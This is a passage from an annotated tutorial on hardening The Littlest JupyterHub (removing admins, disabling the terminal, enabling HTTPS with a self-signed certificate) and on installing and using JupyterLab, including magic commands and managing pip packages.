    reload # Applies configuration changes by restarting/reloading JupyterHub services.

    (VM) $ sudo tljh-config reload

    Or, you can delete a user

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
    remove-item # A subcommand that removes a value from a list-type configuration setting.
    users.admin # The configuration key that stores the list of JupyterHub admin users.
    <username> # The Linux/JupyterHub username you want to delete (replace this with the actual username).

    (VM) $ sudo tljh-config remove-item users.admin <username>

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
    reload # Applies configuration changes by restarting/reloading JupyterHub services.

    (VM) $ sudo tljh-config reload

    Hardening JupyterHub (Disabling Features)

    To disable access to the terminal (note: this does not disable magic commands; threat actors can still utilize them)

    Generate jupyter_notebook_config.py and move it to /opt/tljh/user/etc/jupyter

    /opt/tljh/user/bin/jupyter # The Jupyter executable from TLJH’s user Python environment (not the system Python).
    notebook # Runs the classic Jupyter Notebook application (not JupyterLab).
    --generate-config # Tells Jupyter to create a default configuration file and then exit.

    (VM) $ /opt/tljh/user/bin/jupyter notebook --generate-config
    Writing default config to: /home/<change this to the current username>/.jupyter/jupyter_notebook_config.py

    sudo # Runs the command with administrator (root) privileges because you are moving a file into a system-managed directory.
    mv # The Linux command to move or rename files.
    /home/<username>/.jupyter/jupyter_notebook_config.py # The source file: a Jupyter Notebook configuration file generated earlier.
    /opt/tljh/user/etc/jupyter/ # The destination directory for TLJH-managed Jupyter configuration.

    (VM) $ sudo mv /home/test/.jupyter/jupyter_notebook_config.py /opt/tljh/user/etc/jupyter/

    After that, change the #c.ServerApp.terminals_enabled = False to c.ServerApp.terminals_enabled = False in the copied file /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py

    sudo # Runs the command with administrator (root) privileges because you are editing a file in a system-managed directory.
    nano # A simple command-line text editor in Linux.
    /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py # The system-wide Jupyter Notebook configuration file for TLJH

    (VM) $ sudo nano /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py
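
    Inside the editor, the relevant line changes from its commented default to an explicit setting:

```
# Before (commented default):
#c.ServerApp.terminals_enabled = False

# After (active setting):
c.ServerApp.terminals_enabled = False
```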

    Reload JupyterHub

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
    reload # Applies configuration changes by restarting/reloading JupyterHub services.

    (VM) $ sudo tljh-config reload

    Now, the terminal is removed


    Hardening JupyterHub (Enabling HTTPS)

    We will use a self-signed certificate for HTTPS, generated with the openssl command

    sudo # Runs the command with administrator (root) privileges, required to create a directory under /etc.
    mkdir # Linux command to create a new directory (folder).
    /etc/https # The path for the new directory you want to create.

    (VM) $ sudo mkdir /etc/https

    cd # Linux command to change the current directory in the terminal.
    /etc/https # The path to the directory you want to switch to.

    (VM) $ cd /etc/https

    sudo # Runs the command with administrator privileges, necessary because you’re creating files in a system directory (/etc/https)
    openssl # The OpenSSL tool, used to generate SSL/TLS certificates, keys, and handle encryption.
    req # Command to create a certificate signing request (CSR) or self-signed certificate.
    -x509 # Creates a self-signed certificate instead of generating a CSR to send to a certificate authority.
    -newkey rsa:4096 # Generates a new 4096-bit RSA key pair.
    -keyout key.pem # Specifies the filename for the private key.
    -out cert.pem # Specifies the filename for the certificate itself.
    -sha256 # Uses the SHA-256 hash algorithm for signing the certificate.
    -days 3650 # Sets the certificate validity to 3650 days (~10 years).
    -nodes # Stands for “no DES” — the private key will not be encrypted with a passphrase. Needed for services that start automatically, like JupyterHub, so you don’t have to type a password on startup.
    -subj "/C=US/ST=Washington/L=Vancouver/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname" # Provides certificate details in a single line: C: Country (US), ST: State (Washington), L: City (Vancouver), O: Organization (CompanyName), OU: Organizational Unit (CompanySectionName), CN: Common Name or Hostname (e.g., example.com or your server IP)

    (VM) $ sudo openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=US/ST=Washington/L=Vancouver/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"

    sudo # Runs the command with administrator privileges. Needed because /etc/https is a system directory.
    chown # Linux command to change the ownership of files and directories.
    root # Specifies the new owner.
    -R # Stands for recursive. Applies the ownership change to all files and subdirectories inside /etc/https.
    /etc/https # The directory to change ownership for (and everything inside it).

    (VM) $ sudo chown root -R /etc/https

    sudo # Runs the command with administrator privileges because /etc/https is a system directory.
    chmod # Linux command to change file permissions.
    0600 # Permission mode in octal format. Only root can read/write the files; nobody else can access them: Owner (root) → read & write (6), Group → no permissions (0), Others → no permissions (0)
    -R # Stands for recursive. Applies permissions to all files and subdirectories under /etc/https.
    /etc/https # The directory being modified, containing your SSL certificate and private key

    (VM) $ sudo chmod 0600 -R /etc/https

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
    set # A subcommand that sets a configuration key to a specific value.
    https.tls.key # The configuration key specifying the path to the TLS private key for HTTPS.
    /etc/https/key.pem # The path to the private key file you generated earlier. This file must be readable by root, which it is, because of chmod 600

    (VM) $ sudo tljh-config set https.tls.key /etc/https/key.pem

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
    set # A subcommand that sets a configuration key to a specific value.
    https.tls.cert # The configuration key specifying the path to the TLS certificate for HTTPS
    /etc/https/cert.pem # The path to your SSL certificate file you generated earlier. This file must be readable by root, which it is, because of chmod 600

    (VM) $ sudo tljh-config set https.tls.cert /etc/https/cert.pem

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
    set # A subcommand that sets a configuration key to a specific value.
    https.enabled # The TLJH configuration key that turns HTTPS on or off
    true # Sets the value of https.enabled to true, enabling HTTPS for JupyterHub

    (VM) $ sudo tljh-config set https.enabled true

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
    reload # Applies configuration changes by restarting/reloading JupyterHub services.
    proxy # Specifies that only the reverse proxy service should be reloaded

    (VM) $ sudo tljh-config reload proxy

    Type the IP address of the JupyterHub server and create an exception for the self-signed certificate

  • JupyterLab

    JupyterLab

    JupyterLab

    JupyterLab is an open-source web-based interactive development environment primarily used for data science, scientific computing, and machine learning. It allows users to create and manage interactive documents that combine live code, visualizations, equations, and narrative text in a single workspace. These documents are saved with the .ipynb extension, which stands for IPython Notebook, reflecting its origins in the IPython project.

    Unlike traditional text editors or IDEs, JupyterLab provides a highly flexible interface that lets users open multiple notebooks, terminals, text files, and data viewers simultaneously in tabs or split screens. It supports numerous programming languages, with Python being the most common, and offers extensive integration with libraries for data analysis, plotting, and machine learning, such as NumPy, pandas, Matplotlib, and TensorFlow.

    Key features of JupyterLab include:

    • Interactive code execution: Run code in real-time, see outputs immediately, and modify code cells independently.
    • Rich media support: Embed images, videos, interactive plots, and LaTeX equations directly within notebooks.
    • Extensible interface: Customize the environment with extensions like version control, debugging tools, or additional language kernels.
    • Collaboration and sharing: Notebooks can be shared with others, exported to multiple formats (HTML, PDF, Markdown), or run on cloud platforms like Google Colab or Binder.

    Overall, JupyterLab is a powerful tool for data exploration, analysis, and presentation, combining code execution and documentation into a single cohesive platform.

    Installing JupyterLab on Windows

    1. Install Python (Make sure to check mark the Add Python X To Path in the installation window)
    2. Go to the CMD and install jupyterlab using pip install jupyterlab

    Installing JupyterLab on Linux-based OS (Ubuntu)

    1. Go to the terminal
      1. Install Python using sudo apt-get install python3
      2. Install pip using sudo apt-get install python3-pip
      3. Install jupyterlab using pip3 install jupyterlab

    Installing JupyterLab on MacOS

    1. Go to the terminal
      1. Install jupyterlab using pip3 install jupyterlab

    On some operating systems, such as Windows, the pip command is equivalent to pip3.

    Alternatives

    If you are having issues installing JupyterLab, use Visual Studio Code or any other environment that supports Jupyter notebooks.


    Running JupyterLab

    You can launch the interactive interface using the jupyter command in the terminal or command-line interpreter. That command takes different subcommands, and the one we will use is lab (you may need to elevate privileges). You may need to close the terminal or CMD before running the jupyter lab command, because new environment variables are added during installation (the easiest way to refresh them is to simply close the terminal or CMD and open it again).

    jupyter # Main Jupyter command-line tool
    lab # Subcommand to launch the JupyterLab interface

    (Host) jupyter lab

    or

    python # Starts the Python interpreter
    -m # Tells Python to run a module as a script, instead of running a .py file
    jupyterlab # The name of the Python module being executed

    (Host) python -m jupyterlab
    ...
    ...
    ...
    [C 2023-09-23 13:06:53.906 ServerApp] 
     
        To access the server, open this file in a browser:
            file:///Users/pc/Library/Jupyter/runtime/jpserver-5633-open.html
        Or copy and paste one of these URLs:
            http://localhost:8889/lab
            http://127.0.0.1:8889/lab

    The browser will open and show the interactive interface. If it does not open automatically, copy the URL shown in the terminal or command-line interpreter into your browser.


    Create a Jupyter Notebook

    You can create a notebook by clicking on File, then New, then Notebook. Or, you can click on the following icon

    You can change the newly created file name by right-clicking on the file tab, then Rename Notebook

    In the notebook file, make sure that code is selected and type print("test")

    To execute the code, click the play icon; your code will run, and the result is shown in the next line. You can re-execute this block as many times as you want


    Magic Commands

    Also known as magic functions, these are commands that modify the behavior of code cells, extending the notebook’s capabilities. Some of them allow users to escape the Python interpreter. For example, you can run a shell command and capture its output by using the ! character before the command. This is helpful when the user is limited to the notebook interface.

    If you try the whoami command on its own, it will fail because it will be interpreted as Python code
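
    Under the hood, the ! escape hands the rest of the line to the system shell. A rough stand-alone equivalent of running !whoami in a cell, sketched here with Python's subprocess module rather than IPython itself:

```python
import subprocess

# Roughly what `!whoami` does in a notebook cell: run the command in a
# system shell and capture its standard output as text
result = subprocess.run("whoami", shell=True, capture_output=True, text=True)
print(result.stdout.strip())  # The current username
```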


    Shutting down JupyterLab

    You can shut down JupyterLab from the terminal or command-line interpreter by using CTRL with C or X. Or, go to File, then Shut Down


    Setting up Password

    You can configure a password for JupyterLab that must be entered before a user can access the interface, ensuring secure access to the environment

    jupyter # Main Jupyter command-line tool
    lab # Subcommand to launch the JupyterLab interface
    password # Subcommand to set or change the password

    (Host) jupyter lab password
    Enter password: 
    Verify password: 
    [JupyterPasswordApp] Wrote hashed password to /Users/user/.jupyter/jupyter_server_config.json

    jupyter # Main Jupyter command-line tool
    lab # Subcommand to launch the JupyterLab interface

    (Host) jupyter lab
    ...
    ...
    ...
    [C 2023-09-23 13:06:53.906 ServerApp] 
     
        To access the server, open this file in a browser:
            file:///Users/pc/Library/Jupyter/runtime/jpserver-5633-open.html
        Or copy and paste one of these URLs:
            http://localhost:8889/lab
            http://127.0.0.1:8889/lab

    External Modules

    The following are some of the external modules used in data analysis and visualization

    • numpy – a library for large multidimensional arrays
    • pandas – a library for data analysis
    • matplotlib – a library for creating interactive visualizations
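
    As a quick taste of the first two libraries (assuming they are already installed; matplotlib is omitted here because plots need a display):

```python
import numpy as np
import pandas as pd

sales = np.array([25, 30, 35])  # numpy: a numeric array
df = pd.DataFrame({
    "Name": ["John", "Jane", "Joe"],
    "Sales": sales,
})  # pandas: tabular data built from the array
print(df["Sales"].mean())  # Average of the Sales column: 30.0
```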

    Install Modules

    You can install all the modules using the install command in pip

    ! # In Jupyter Notebook, ! lets you run shell commands from a cell.
    pip # Python’s package manager
    install # A command to download and install libraries from PyPI (Python Package Index)
    numpy # Library for numerical computing, arrays, and matrices.
    pandas # Library for data manipulation and analysis, especially tabular data.
    matplotlib # Library for creating plots and visualizations in Python.
    beautifulsoup4 # Library for parsing HTML and XML, often used in web scraping.
    lxml # Library for fast XML and HTML parsing, used by BeautifulSoup for speed and reliability.
    selenium # Library for automating web browsers, often used for testing or web scraping dynamic websites.
    webdriver-manager # Library to automatically download and manage browser drivers for Selenium, like ChromeDriver or GeckoDriver.

    !pip install numpy pandas matplotlib beautifulsoup4 lxml selenium webdriver-manager

    Review Modules

    You can review all installed modules using the list command in pip

    ! # In Jupyter Notebook, ! lets you run shell commands from a cell.
    pip # Python’s package manager
    list # A command to list all installed packages

    !pip list

    Remove Modules

    You can remove any module using the uninstall command in pip

    ! # In Jupyter Notebook, ! lets you run shell commands from a cell.
    pip # Python’s package manager
    uninstall # A command to uninstall a package
    xyz # The package to uninstall from the system (placeholder name)

    !pip uninstall xyz